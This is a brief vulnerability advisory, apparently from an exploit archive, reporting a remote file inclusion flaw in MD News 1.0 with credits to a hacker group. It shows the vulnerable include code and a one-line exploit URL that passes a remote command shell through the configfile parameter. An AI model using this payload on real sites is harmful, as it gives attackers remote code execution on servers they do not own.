MD News version 1.0 suffers from a remote file inclusion flaw.
6811f568fcb7c349aef9ce1bb0e795beb172cb12e3a91e92099eb8cb8a06c329
# SaVSaK.CoM | SpC-x - The-BeKiR |
# MD News 1 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : MD News
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx
# Code :
# $configfile = "config.php";
# require $configfile;
# Vulnerable :
# http://www.victim.com/MD News/latest.php?configfile=Command-Shell